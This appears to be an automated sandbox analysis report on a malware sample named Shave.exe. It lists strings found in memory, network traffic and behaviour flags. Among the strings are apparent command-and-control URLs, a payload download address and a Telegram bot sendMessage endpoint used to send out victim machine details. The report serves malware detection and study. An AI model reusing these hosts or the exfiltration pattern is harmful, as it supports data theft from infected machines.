Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 06:09:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Shave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Shave.exe, 00000003.00000002.3299164468.00000000352A4000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035283000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003529A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.cipmach.com
Source: Shave.exe, 00000003.00000002.3280053840.00000000066D0000.00000004.00001000.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin
Source: Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin6
Source: Shave.exe, 00000003.00000002.3279604982.0000000004B78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.binQ
Source: Shave.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Shave.exe, 00000003.00000002.3299164468.00000000352F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Shave.exe, 00000003.00000002.3299164468.00000000352EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Shave.exe, 00000003.00000002.3299164468.00000000351A8000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Shave.exe, 00000003.00000002.3299164468.0000000035322000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035313000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Shave.exe, 00000003.00000002.3299164468.000000003531D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040543E
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Creates files inside the system directory
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Windows\resources\0809 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00404C7B 0_2_00404C7B
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F971B63 0_2_6F971B63
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00404C7B 3_2_00404C7B
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015C19B 3_2_0015C19B
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015D278 3_2_0015D278
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00155362 3_2_00155362
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015C468 3_2_0015C468
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015C738 3_2_0015C738
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015E988 3_2_0015E988
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_001569A0 3_2_001569A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_001529E0 3_2_001529E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015CA08 3_2_0015CA08
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015CCD8 3_2_0015CCD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00159DE0 3_2_00159DE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015CFAC 3_2_0015CFAC
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00156FC8 3_2_00156FC8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015F974 3_2_0015F974
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015E97C 3_2_0015E97C
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00153E09 3_2_00153E09
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B081D0 3_2_04B081D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E9D8 3_2_04B0E9D8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B08FB0 3_2_04B08FB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07B78 3_2_04B07B78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C0B7 3_2_04B0C0B7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B038B8 3_2_04B038B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E0B8 3_2_04B0E0B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E0A7 3_2_04B0E0A7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B00498 3_2_04B00498
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06488 3_2_04B06488
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B008F0 3_2_04B008F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C0C8 3_2_04B0C0C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06030 3_2_04B06030
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0BC38 3_2_04B0BC38
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0DC28 3_2_04B0DC28
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0BC2A 3_2_04B0BC2A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0FC18 3_2_04B0FC18
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0DC19 3_2_04B0DC19
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03007 3_2_04B03007
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03008 3_2_04B03008
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06478 3_2_04B06478
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03460 3_2_04B03460
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03450 3_2_04B03450
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0345F 3_2_04B0345F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B00040 3_2_04B00040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B011A0 3_2_04B011A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01190 3_2_04B01190
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0119F 3_2_04B0119F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B015F7 3_2_04B015F7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B015F8 3_2_04B015F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C9E8 3_2_04B0C9E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B015E8 3_2_04B015E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C9D8 3_2_04B0C9D8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B081C0 3_2_04B081C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E9C8 3_2_04B0E9C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0A938 3_2_04B0A938
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E538 3_2_04B0E538
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0A928 3_2_04B0A928
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C558 3_2_04B0C558
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B00D48 3_2_04B00D48
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E548 3_2_04B0E548
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C548 3_2_04B0C548
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01EA7 3_2_04B01EA7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01EA8 3_2_04B01EA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01E98 3_2_04B01E98
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B022F0 3_2_04B022F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D2F7 3_2_04B0D2F7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F2F8 3_2_04B0F2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B022FF 3_2_04B022FF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F2E7 3_2_04B0F2E7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04ED0 3_2_04B04ED0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B072C8 3_2_04B072C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B072CA 3_2_04B072CA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04620 3_2_04B04620
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04622 3_2_04B04622
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06A18 3_2_04B06A18
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06A07 3_2_04B06A07
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06E70 3_2_04B06E70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06E72 3_2_04B06E72
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04A78 3_2_04B04A78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0CE78 3_2_04B0CE78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0CE67 3_2_04B0CE67
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0EE68 3_2_04B0EE68
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01A50 3_2_04B01A50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0EE57 3_2_04B0EE57
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01A41 3_2_04B01A41
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01A4F 3_2_04B01A4F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02BB0 3_2_04B02BB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02BA0 3_2_04B02BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B08FA1 3_2_04B08FA1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B7A8 3_2_04B0B7A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02BAF 3_2_04B02BAF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D798 3_2_04B0D798
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B798 3_2_04B0B798
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05780 3_2_04B05780
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D787 3_2_04B0D787
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F788 3_2_04B0F788
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02FF9 3_2_04B02FF9
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05BD8 3_2_04B05BD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05BCA 3_2_04B05BCA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07720 3_2_04B07720
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07722 3_2_04B07722
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05328 3_2_04B05328
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B318 3_2_04B0B318
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02300 3_2_04B02300
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B307 3_2_04B0B307
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D308 3_2_04B0D308
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07B77 3_2_04B07B77
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F778 3_2_04B0F778
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07B69 3_2_04B07B69
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02757 3_2_04B02757
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02758 3_2_04B02758
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02749 3_2_04B02749
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36678 3_2_04B36678
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35FD8 3_2_04B35FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3FAB0 3_2_04B3FAB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B356B8 3_2_04B356B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38CB8 3_2_04B38CB8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B336B8 3_2_04B336B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E2B8 3_2_04B3E2B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B374BF 3_2_04B374BF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A4A0 3_2_04B3A4A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3FAA0 3_2_04B3FAA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38CA9 3_2_04B38CA9
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B356A8 3_2_04B356A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A498 3_2_04B3A498
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31280 3_2_04B31280
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32488 3_2_04B32488
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3BC88 3_2_04B3BC88
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B348F7 3_2_04B348F7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B2F8 3_2_04B3B2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B316FF 3_2_04B316FF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CAE0 3_2_04B3CAE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B2E8 3_2_04B3B2E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CAD1 3_2_04B3CAD1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B304D0 3_2_04B304D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B374D0 3_2_04B374D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B304C0 3_2_04B304C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B336C8 3_2_04B336C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E2C8 3_2_04B3E2C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3AE30 3_2_04B3AE30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39637 3_2_04B39637
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33238 3_2_04B33238
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35228 3_2_04B35228
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3322E 3_2_04B3322E
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C612 3_2_04B3C612
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C618 3_2_04B3C618
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3AE1F 3_2_04B3AE1F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3521C 3_2_04B3521C
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3DE00 3_2_04B3DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30006 3_2_04B30006
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36609 3_2_04B36609
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37008 3_2_04B37008
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D470 3_2_04B3D470
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31270 3_2_04B31270
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34478 3_2_04B34478
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32478 3_2_04B32478
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3BC78 3_2_04B3BC78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37E60 3_2_04B37E60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D460 3_2_04B3D460
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34468 3_2_04B34468
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36668 3_2_04B36668
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37E50 3_2_04B37E50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3EC58 3_2_04B3EC58
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30040 3_2_04B30040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3EC4A 3_2_04B3EC4A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39648 3_2_04B39648
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31BA0 3_2_04B31BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CFA6 3_2_04B3CFA6
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32DA8 3_2_04B32DA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CFA8 3_2_04B3CFA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B7AF 3_2_04B3B7AF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31B91 3_2_04B31B91
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E790 3_2_04B3E790
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34D98 3_2_04B34D98
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37998 3_2_04B37998
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32D9C 3_2_04B32D9C
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39180 3_2_04B39180
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34D89 3_2_04B34D89
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37988 3_2_04B37988
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30DF0 3_2_04B30DF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B387F0 3_2_04B387F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3DDF0 3_2_04B3DDF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36FFA 3_2_04B36FFA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31FF8 3_2_04B31FF8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30DE0 3_2_04B30DE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B387E0 3_2_04B387E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33FE8 3_2_04B33FE8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F5E8 3_2_04B3F5E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31FE8 3_2_04B31FE8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39FD0 3_2_04B39FD0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F5D7 3_2_04B3F5D7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39FD8 3_2_04B39FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33FD8 3_2_04B33FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B7C0 3_2_04B3B7C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35FC7 3_2_04B35FC7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36B30 3_2_04B36B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35B39 3_2_04B35B39
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D938 3_2_04B3D938
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F120 3_2_04B3F120
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D927 3_2_04B3D927
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38328 3_2_04B38328
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F111 3_2_04B3F111
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31710 3_2_04B31710
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39B10 3_2_04B39B10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38319 3_2_04B38319
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32918 3_2_04B32918
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39B0A 3_2_04B39B0A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34908 3_2_04B34908
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3290E 3_2_04B3290E
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39171 3_2_04B39171
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E77F 3_2_04B3E77F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30960 3_2_04B30960
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A968 3_2_04B3A968
